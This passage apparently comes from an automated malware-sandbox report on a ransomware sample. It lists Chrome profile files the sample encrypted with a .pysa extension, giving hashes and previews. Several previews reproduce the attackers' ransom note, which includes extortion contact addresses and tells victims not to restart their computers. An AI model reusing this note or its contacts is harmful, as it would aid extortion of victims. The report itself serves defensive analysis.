                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.362556754798233
                  Encrypted:false
                  SSDEEP:96:9+lU/VYnmBUnY3vXH8QtvIxJHBHgbEAJJRplKJCfDtUuBBKJvKQiqJzQf+gNYX9X:slU/VY9nqvz9IxFhg4yRpMi2iKJ5iYvP
                  MD5:E8DE9B221B4C1FC6DADE1AAC02CAD681
                  SHA1:377C4C486B551BA0923BCC2A586CCC37E8D066FD
                  SHA-256:4E348ADD2DCD5604A869DE44E3925A9DEF5C62976490C0CE353716E711FC2573
                  SHA-512:C33C1BC6604068D990BFD6388B0462B46C44C9A444FD5BF8EDB96ECC6D0B0B446E15ED9B16772BE6855D8B920D256ECB7A2CE3080B4C7AE289357E98C3266A34
                  Malicious:false
                  Preview: .P..\l.....m...*....D.....{.o....$...~[wq-.u....:l"@..B.....}f.4nQ...T.Cv]?VX.....,.J.{..gJ..].emz......C'E...3...2r..3M.U.o..K.....s..Pl...>.e.d ..0C-gg..`...r.k4...4.`...f......../..1.?....L.F..an.Q....fY.......D..K..!...Ww.&./..>..lR.X.9..2..Y...s8_..B.q.(....u.....B#.s.x.)..A...... .{Jh.\......i...).E.F....2...;(y.-vd....{ ~....~...u.a..]5._..y1 g&.f.U ......)...[.[.I>.}3]...l....B../K..>.P...H....y...T.M..<..u...W.n...&.."....rP..."f..C...Iy...?........\f..-.M.i......&Ed1..Juq...Y...c..A.z:t..`}...L..Cq...9..3...mu......#E...#..*...O.eu...R..)p.......OE....2............>P....-X....p.bk..\.OO]..?.*r.B.p.r.&.a+.Q..s .........jjL.K.#W...T%]y....u9&.,.`:...R..D..%..f.{...0........;..D.....>.P....^......T....}..e...4._...O#@.v....Zs...v.Q.I.....@....>T<.>...x....\{..qtf{=..p...d|/Tr9j^G......A...G.........I..w..`:f..3.._...y.,.t.Dv;...-s3u..{.z.e.. ..",.g....8S.V...F.F..F.......J..B./q.K.w.P..R.F.Do4.y....3w..$...M.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):41984
                  Entropy (8bit):7.974881543618746
                  Encrypted:false
                  SSDEEP:768:tMM1B54F/UWsAmUmy4OfewS2wEfECmAQ8OJEuMmgqGHoPm+L3A4z1/xNjYmHsSp:uM1W/nm9eeqZmD8OJEuTxNus39d7
                  MD5:23671604A6A243B49317EA16D8DB4BE3
                  SHA1:796AFEAEE05692D6AF658D96FD534E0F942A033E
                  SHA-256:8BACD5E24C783059987B8C130B757048BFFD06399D1E2157565ADF24F70E5D8E
                  SHA-512:DCB71F8B5A40560EC8CF3E6CCE1315B344B436B5B7EDD12BCA37866F4F4960381C7E5129A14C263BB0A6D49D2DD5466EB9E434D3B35952C7B3E91FEDED337DAB
                  Malicious:false
                  Preview: aV...z.7O....S...R}q4..2...!..K.&s $.......f..m.SiOs..O....RI.Vh....H.c...Z..*.....v....y.v.4|!.~...n.c..*n.(..Y.a.(..y.Z..6....n.Wp.o..v.o..N..ky..S.6.-yX>.s$.ww.;..*..D..b.P<....7..3W.d..`....kA.O.Tew.F+..<5l..r^h...$..i3..H...QH.>^b.(S7{9..@..X.....j..{...Z?V1?~.t...L.k...S..W............/....d....:.......;.k..7/3Qlhj].u.N&)..-...6[........?....7.=..r..w...kXX.....e..D1......[.9.C...a.d$....4.5rhC...(o@.%z.......k./...*`p...i&n..8.g....w.........q...2}..].zG7w.U.;....FT....L...?F@.&. ?..J.PT.'2(...v.e......hE.p.mn.eM6.j..)...HR..bni..s..gf...kP..mu..CU...M..pA.>S#]. ..S.).Wr..{..Q.......!.R.9.5.p#.a.bL...(.T-.3.Y)9..<."n...\...K....e..\.x...3C...b.jY#1.D.a-5..9g....'......]....gQ.z1.{.o=.Y....Oe..X.2..l.....w.v*S.....R..PgR..#L.0S}....../n..|nn.d.>...P[.....A....shR.O]y{..6y....u......*.'.O.w.X.$..P......i.....4..s.PQ.{G.N.UQ..b."=.f..v.1.3.b)......J..y.M.".9)...g`..AEx..S..l....n....G.+!.<`._..d..l.....^..IWuu......uM...Z...0...Q.t.`
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Media History.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994338629925937
                  Encrypted:true
                  SSDEEP:1536:iEoPZn3+j8vzcEMde5BYPS9uqJUO26+eOM2vAwQ1vlntgQgXscZ35SvmALVOKG:olQ8vzMGB8umU72vMF/gYQpSuALsJ
                  MD5:75B21CF61F4E0BB73A1CC493E7C7C717
                  SHA1:51C7F2EC644A3B18ACD0A164E7AF5069B75FE2B3
                  SHA-256:BA77F47A3C81B813917C46F01BCB9154AC63CAFB2BC6F8EB6687A4B28127BFA8
                  SHA-512:07F799A220AB4F8D7130EFB38B1C32BBE5E35A775A7C08ABA25478E0D491073B1B3120FC33ADE6084827B5DA87D7F71538AE99D7F37C20386F1C9A8DB87756FF
                  Malicious:true
                  Preview: .s...f.[>....._..L.s..XHP.}.m{&...f..)CZ..n....l.../5.E.{..z........BS..}.me.45......H.\e.4.ae.......g.{.:\..e,..'.>.35Q..k.ze_>>#^..>.|.A......V.._rD;.....n.te..G..Z.HU..i..?.8?.l.:.L.....tI.kr.t....I.x..c.m....#*.S]W..._....T..[E%..J.......w.3...4q..K.Y..e.......#....#k@v)......$uAh.6.F.j...vK..loSp|r..Px..._.d..#+...X..8:g.";...!J...{...1j..5...]...44..FN.6.....^.xa..3^.......`w...e..FE...V~./n..@.....[...1....X=..FGU..M.RX...F......|..c._W...k.y..vC...#....._.Z.S..]u.Bh.U)^l..w.50et.5.'$.)@.K. I........a3.%T....,G....&w...":....5$..VY..U.O]=....Eg'.Y..ym.-e...^....^..'.H..5X........o.o1.../.<..........p8....".w[..W....%..!...+...Z.).2.....[S.!.$...@.4..f..P.dP...w.X^8....=...#._c;..`=.4.F.}M.L.L.F.;.g?....P....=)}.-..h.....%...9....f7...Z...&....E.MF.4..L&...?.>~.....![]e.F3....(........P..o.7.?_.c.,.i..S.g...L..5s../B3 ...x$.93...v.o7.R...%.`Y.0.k.7...'...b.L.`~..2..h`.....i.Q.....^#.;...5G..}l.R....1...;E.:....1...L.Xv.`!.9.8.m...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.970283670848064
                  Encrypted:false
                  SSDEEP:768:uljjoH/xbuTlHd7qaEesLXCo4tuvI0Y06CC58Yqs4oXw52xpmPYpXAPH15W3:0jjoH/xby97PEe8Coo01i3jVXw5AQQpb
                  MD5:185E20FCBEDF50D161071AA4F7BDB040
                  SHA1:45B923122D1093CAB3FEB4D3EF0C21FD8191B60A
                  SHA-256:B3038B9CE75C6BF5255ABE5805BC9739B8BA1CC6BE1A890174C50B4FDF99AA9A
                  SHA-512:C433392A43C7F1D91842BA1950E26D5F9D2911EE43474A7791033F35E6B13DB5A6BA49F8665CEB0BB9D9BDEDB56A370A3843E75B213F967CE205C692EA83E5E1
                  Malicious:false
                  Preview: ..p.H..k..~8.._..G/9...".CN..,..N..............Ma...D..;.Y}.m.]X.....\k..(..0....u~.......&.....(6..w..d6o..m2.....Sa<Z.b..!.=... ..-......%..T'...=.~.P\cV9E.....CS>.p..uY..u.rSp.z..u.v..3A.>W.x^t....`.#:!..v.Q. f...b&FiL..Y%"1..W..s....3T..~.f..F,$.d..W.<....@.....%V..........h....</~....6.T.{..N.`,^..7..p7..I.q...,.Tf.....@.M......S/`....#M..d0.i....I.....x......@....ur|.....b.e.W.M..xM?..T..\(t.".j.NO.c.......e*od$..PXI..N.;......fW..1...[.."...y..O...n`.......I]..hBY[...........K..M..E.SocPJ..U.@.."`.[......?.*.U|l.....'.CM..'..6_.+..5.v.gY...M..9..q0>?.ke..."4.8..d..XS.4..< .... .E..d.M...7}.~......%yc&.v5....rf.L...g.s..)ea\..P.......2.+y......?.F...._.>n...V..D..}.!...Uzf.R.LG.G.~U....J.>33....;v..A)...\...q..-....M...T.!.Y.(..Lo..]..k.j.L=...g.@..{'.-..7...Q....47...vI.........YZw...hB...[.....o."........i....'#.WMJ.CL...Q.,<..i....j.d=.._..b|.^..zTO5*.X..l.xot......Y....7x/AvJ...LR..%......X[...@..xP.F[.]..s0....g......t2..f...Q..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):7.365094530615888
                  Encrypted:false
                  SSDEEP:96:gc5QYNpKy5fBC55ZraEy4m97vWvV4ACj58T6ih7aJnlAt1vVkNMsXU7O:p5QYNpKy5f05PWE7m1WvrP1atlA9kNJP
                  MD5:BE852AC320603F613CBC14C3F1ED49DC
                  SHA1:B91C48A62772BD6E78AFA493D48615790AD99166
                  SHA-256:5259CEA845E8C664AD84EB776DB0333B84A4D453BC9840591B8CE6575A5A09C0
                  SHA-512:E275A63D477C6CAC5A854CE4AE7AA99F02724365ABCA5A516AAF775767B60C944976792BF50AA6492F83D83BC3FAEDE0B995548663AA1B3B0D2DF29C3A1EFB6B
                  Malicious:false
                  Preview: <.A.y.....hQ....7..x!4.YTL~.e`...V>..u..!..........y.....F.X$.+..RYj...".M|ji..=.e..Ur..T.....Q......3....Q|.'}Oc...W-(P.K.'.p7>.X.u..*b...:.....'.._Z.C.6.].KQ..I8.8wQV.......N{g1... ...?.\...'...{...As(c...#{V..y.T....J.W.b.=.".&..m...a..=,K....q...x./j.4~".N-.t6.^)rn1]..k.Y...h ....:...8..X.q^.z.|.|.X..@.w....r....#T..w......=.R...2.0..F...o.X.. ^...e..t..N.9...%%.%ke..%.y/..q...S......)'yG...o.Y.7..@}Y.{.6...y.....i..\..E......3Z.GU.=..8...............CV.I...v.!...U..(..bX.Z$.k..P..\.d&...TD..>.. ....&......L6......m..2........"....w(tg.Z..-.m:.J..w.SKn.FhB..s.,c.H"!.*w#j..~..W.w>.2h.3.'...{i..2.=.............T..~.U.'!`s]...0...bU..`"yt..0F.'/...R.yYx..ux..~.........J.......z(6.<-.e.(.INd+NN..[.1j..f..L..v.c~.,8~y.)...8............y+....@:........n....h...6...m.....V.....mn9.z..........l..X......t.k`...m....N`....^.KU.....6q._.K.A.....C-e...,..U.pP2......k..d:.s........C."8.Y.c..J..K...F9.9.B...m.NP4..R..7P..y.g... ucw.B.]......B.(
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7168
                  Entropy (8bit):7.508224164473578
                  Encrypted:false
                  SSDEEP:192:ixxdzVOixwprV1mGmQfZSZtoqxetoytejr1veyXtx:6jxwJzMQf2tonAr1veydx
                  MD5:862FADE7803EFE8D66282BF3ED8FC299
                  SHA1:0FFB0F99418BC12CB99371545860D03672C15628
                  SHA-256:8D02060A79719378F3259FC1EC35778C116874C28772900BA6DC73D154CF697C
                  SHA-512:73AAF72EEF744FEA9D82A9C2899BC7BABA317FE6E9358066DD6DB4E0982E4EADD0EF124547D5DBFC36A906D20C575F74EE22DDED821AB0CBEC7751668DBC0EA6
                  Malicious:false
                  Preview: Q..J+.q...t.S....5..r..Q..5%h....R..4......w..m...9,.2.60fE.Of.a.$$.d...L.Mp.r.'%............."i.I.=..m..q._`.%+!.30...f.yu.$.+}.oo.....(.}.z..,t,.E..GI....O.Hy..D.'.t.Li......xa&d.&.|8.N.......svB,R..-...[@.c..&^..'..x.w6'?."....sOA[.&e...9.=J!.]4.....=..]/.U....D3vJ..... ..s..F.}...X...y..&...V2D.i..:...3.....MR.>t%.R.'..<.(...J....]..gMj.....l.+@.....A....A...!...I.....Q....r..U..../.R..T.8..M.....n0..^.|...,../.d...c2'...4'!.N..^.5...&.;.q...JI....&......@...*..@)....:*...".F..=.x....v.6...z.d.....A...6..FH....&....l..qc.....`.=..}K....&.i}....2..K$t....w.&V6 ..^g.3/.`@R.....$.p...%b..!.F.g@....&..Ss{..}O....jc..'.sG#..d.6.e.....[.f.lB]...+%.3..T(...Q.].\.E.,f...D.,.#&...t.Q`.vN......~c&...z&R \aH..o7..>....$.....K.....%..v.N....S....g.A<Z..;.C(.r..1Z7.m.....h..Q.).I..et.....G....c....o.^....0..B9....t#Z...v.j..X......vt#h.'....}.b.....L..K.p ...G...6..C`..Jh..i8..i.;/7b@z:..".......k..[r..2T...H.. ,....A..Tt....1..8c.mG.*.f..9.....Ib.o
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.9686031712512015
                  Encrypted:false
                  SSDEEP:768:WRHw4mEu9VYlSGkXlB9gumueW1V7y64NtpXOBxKfsgr8IfV:c6EujYl3k1/g61VIt5rEgYIfV
                  MD5:21BF24AE7BA4F00D8560400BD276C610
                  SHA1:419918AB9E746D0DD21B3B74F8B632EBD3B218AE
                  SHA-256:4B730F0AD793CFAFA06A9A643E51BDFA3DC776A3B1A80E5DDEDF74D621E73CF3
                  SHA-512:A05733E6C65849AE8A5F642A565798FE7BD608232CA3B06CF560BA8AB7DE3E69282DC246F3CAA43940840E742FDBEA3FFE75F5038E2DE73EC7EEBE0D5D7A8824
                  Malicious:false
                  Preview: G?z..[.~..d.+.......;..G.]|p=hYB..H_c...5..(........2...r.(...+S....G.../..O.b.x...)@0P'a=mE....d|..T.u..2.z@k...Z=.(......\.;.x.."VQP......4.Y$.........j.....A.....#....W2.Vd.Us].I..3.)q.Bpt.C........Z|P..,....Fx.s).+s.&..V..o...D.H.W26<..p....r/..N.F...yb....F.......<..$.`[...{c..J...U..G..^..w[.W.M .o.8....V....[e.F..?.M....V.F.W.. .._B.......q...q76.D..,..T.....)R....>....fvY%c..*..".5.U.XHr....K4.....j+r..!...4..)UY.W=..1.\R..b.)."...;tIi.":..L.sa.4_.zy..C{...|..{..[.tA..5@......7.i!..4B._.K.8%{.p.....*.C2.O.p'.~b.v.....J...H....,......T ..M..p....DS..x..c......w..UM..6.C^/ghUT`....z..2\.V.d.f.S.(.06..K.stN..@Q/.3.5.!.EL....1.H0.].m-....4..<..e...q..%N.k...T'*....bC..7..d..-....k.O..V...fN.H&..3.....r].W.3.g$J.93.Z..a.....wE.L).S....3..0..>....:r...r......M..5:Y..hp.T.$2....Hs.kD6(I..!J.M.n.KN.y.=.I..U_A.NA .*...y.am.E....Rl..e.j`..).Ze....0....<........1...-...]X.G...UA.;.T.h.."8)...q....Ne...JNaU.S.S'.......`(.....A.....q..,
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):33792
                  Entropy (8bit):7.965011117857326
                  Encrypted:false
                  SSDEEP:768:MFNn/TXASwb3KdOxg+s7RLEwuSmc1ghSyWaarUE2k2CM9fN86:sNn/TXAS0VhSE9zbWaI6rfK6
                  MD5:81FB36F36DF57AF28AA059DAC3107FD1
                  SHA1:A5853C5E2DFD183454BFA358AB98AF1B49DD803F
                  SHA-256:B6775C0418A96B72DA201D255DF5B2760945F7A8ABA3ABCB3E5F581808CE9BDD
                  SHA-512:6DBF216D0AF5367D27A6456B0E1547CD4B1CB18FFA6CCF0DBFEBA1D6B5D04BC002649059459BCA4CBCFD253D226ADBB02A04203E6842BC3CD320052E66C55DB9
                  Malicious:false
                  Preview: .....l.....B.%<.H.W...C......i<.v.|m.A..A.'..f!.....#..G...F0...a\.i...}z3.._..e....M.k.0..S....f........w.X..?................p...q....?!e.3r.Cr....4Qi.......[..;...X.u........X...1K....(a......[1.5.N<5X.r.;g.a......l0....7..z2..!&.YI.4..t..F\.&......q.3[.#..LXP..Q.X..x.....0!\g..rc..Nu..2..;3.T_.k9r.).W\1<....K...(.E.......j..8.J2..n...,.6hX.;F.!........+....W..}@ .V..ZY.2.I.fAd....B..|..(... 9..?o...a...S...4...#/.M.$..5..b..re..A.....Q:]6.K.K....o..........M^I.U_....f}..7.%,D.m....T.H.<A..r..A.Z.o.|.[..g_."6..27....^..".....m.W`A.....)(m3..@...T..\.I..{.1...vo#}....\...J..H.&$.....>...`.u.7.{x....8.|.'....=aA.x..rUY.?.....n...........S'!..}|..."..{4.u.B y....-...D.+.3[Imp>c.._fz..C.....B..7..S8/...7.&4...X..)...')\.=....EA.rL....hBVzz.q4<.rF..w.DG..r=.Da.rR(....2....q.V..e.0i.|PF.H...V..c.......en...u......i..!Q.~....c!7b...\) ...."o.}..x. .Q..".j.q?.gC){.......I....kD,A........O6..z._.......u.R<@...............L.".N.E.9....A;.X....m.v.[..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):21504
                  Entropy (8bit):7.92117764811029
                  Encrypted:false
                  SSDEEP:384:e2cC/Lbo6zI6TnLboOjIHlCNj2RcQBsAowX8trBbRe4:e2ZL8UI6TncRcQ6cstrtRe4
                  MD5:CE11F1F23F069E718F3B0CE3EADDECA2
                  SHA1:DEFF6FD46E8E49FA64200F097AC527D1FDA30AA4
                  SHA-256:5406EF0F4F72E29BE75C10E35DDF366F27648A54A44FE48FA6DAE99C1FC0C80D
                  SHA-512:1EBF9C75E901F442EC6574CD2CDECEE20320E1C4EBF7E29151F045E8E1BC20B873708474156EBF67B8C9CB82312538E2C252BBEA9415673775817D30D84B6930
                  Malicious:false
                  Preview: ......'._!..Fp..2..)..8L .x.)o9Gn.j..`:..Ib..s.V..........].UL3...hR'.z../W.t..6....yKZ...R"............,...*j`. Q.{z.8..A.;.j.G..\.....(.......L...h.6.u}/Y..F^Wu..#...[...#.K..!.&m.y...j..R.=.si..\.S.r..'E......a/..7.....@.^.m_U#.w.. .Q..T....o.?.#...lP.hN.5.B)....t..z.P..QV..)wE..i>!h.9......<......]e...6P..&.....A...G@(....oa....F.....].j.....wz.]Nl.9.<.......5Q.A.9.8..h..a...&..:..........S..f..(..^....Gfr.6.J...:c..X.U...<..3vV.....}U.,'.~......C..bC0..Aj)#o})..8=....1.\I6.<.du....=...7..5.c....W...bu1.(...N.K*Oy.....'...........H*...Q.....\..k.......$..4.v..P....ptg]..n._.......$C.nt_..U.=..k....._.....@}....{.!.:....t.5.f.W..S.s.7..JN.S..F..O...........H8D.O........y:.f......".....t.2.`..<.>m....G-1|.6..l."._....}..N.$.x.X..g,.+..`...U.@.D.u .g...%....7....B1..|..]...G......HJ..r\>.bLiy%(.J..O..E.....e....3...0....:%yFA.6.u.|H.hA..n#7.. ].0EV..}.....r]+z.P.n(..Hy..+E8.oe...(.@.CTW.b.}.A....l9.\.&./....).....&...N.S.6...8L..".~.~
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
